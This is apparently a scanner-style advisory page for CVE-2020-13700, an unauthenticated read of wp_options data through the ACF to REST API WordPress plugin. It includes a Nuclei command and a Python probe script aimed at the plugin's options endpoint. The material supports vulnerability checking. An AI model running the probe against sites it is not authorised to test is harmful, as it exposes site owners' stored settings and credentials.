
Exploit for WordPress acf-to-rest-api <= 3.1.0 - Insecure Direct Object Reference (CVE-2020-13700)

Description:

The ACF to REST API plugin (acf-to-rest-api) for WordPress, through version 3.1.0, allows an insecure direct object reference via permalink manipulation: a request to wp-json/acf/v3/options/ can read sensitive information from the wp_options table, such as the login and pass values stored there.

Nuclei Template

View the template here: CVE-2020-13700.yaml

Validate with Nuclei

echo "$URL" | nuclei -t ~/nuclei-templates/http/cves/2020/CVE-2020-13700.yaml
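For a manual check without Nuclei, the following script is an added example (not the Nuclei template and not the plugin's own code). It sends one request to the options route named in the description and classifies the reply. It assumes that a vulnerable install answers that route with HTTP 200 and a JSON object whose "acf" member holds the option fields read from wp_options, that the request needs no credentials, and that a patched or absent plugin answers with a WordPress REST error object (a body with a "code" member) or an empty "acf". The sample responses in the test are constructed, not captured.

```python
"""Manual check for CVE-2020-13700 (ACF to REST API <= 3.1.0, options exposure).

Added example; assumptions (not confirmed by the page):
  * vulnerable plugin: GET /wp-json/acf/v3/options/ -> 200 with {"acf": {...}}
    containing the wp_options-backed fields, no authentication needed;
  * patched/absent plugin: a WP REST error such as {"code": "rest_no_route"}
    or {"code": "rest_forbidden"}, or an empty/false "acf" member.
"""
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

OPTIONS_ROUTE = "/wp-json/acf/v3/options/"


def build_probe_url(base_url: str) -> str:
    """Return the options-endpoint URL for a site base URL (with or without a trailing slash)."""
    return urljoin(base_url.rstrip("/") + "/", OPTIONS_ROUTE.lstrip("/"))


def classify_response(status: int, body: str) -> dict:
    """Decide whether one HTTP reply indicates readable wp_options fields.

    Returns {"exposed": bool, "keys": [option names seen], "reason": str}.
    """
    result = {"exposed": False, "keys": [], "reason": ""}
    if status != 200:
        result["reason"] = f"HTTP {status}: endpoint absent or access denied"
        return result
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        result["reason"] = "non-JSON body: probably not the REST API"
        return result
    if not isinstance(data, dict):
        result["reason"] = "unexpected JSON shape"
        return result
    if "code" in data:
        # WordPress REST errors look like {"code": "rest_forbidden", "message": ..., "data": ...}
        result["reason"] = f"REST error: {data['code']}"
        return result
    acf = data.get("acf")
    if not isinstance(acf, dict) or not acf:
        result["reason"] = "no ACF option fields returned"
        return result
    # Non-empty "acf" object: option fields were served to an unauthenticated caller.
    result["exposed"] = True
    result["keys"] = sorted(acf)
    result["reason"] = f"{len(acf)} option field(s) readable without authentication"
    return result


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """Send an unauthenticated GET to the options route and classify the reply."""
    url = build_probe_url(base_url)
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2020-13700-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        # 4xx/5xx still carry a REST error body worth classifying
        return classify_response(err.code, err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} https://target.example")
    print(json.dumps(probe(sys.argv[1]), indent=2))
```

Run it against a site you are authorised to test; a result with "exposed": true lists only the option names that came back, so the values themselves are not written to the terminal or logs.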

References:

https://github.com/ARPSyndicate/cvemon
https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
https://wordpress.org/plugins/acf-to-rest-api/#developers
https://nvd.nist.gov/vuln/detail/CVE-2020-13700
https://github.com/airesvsg/acf-to-rest-api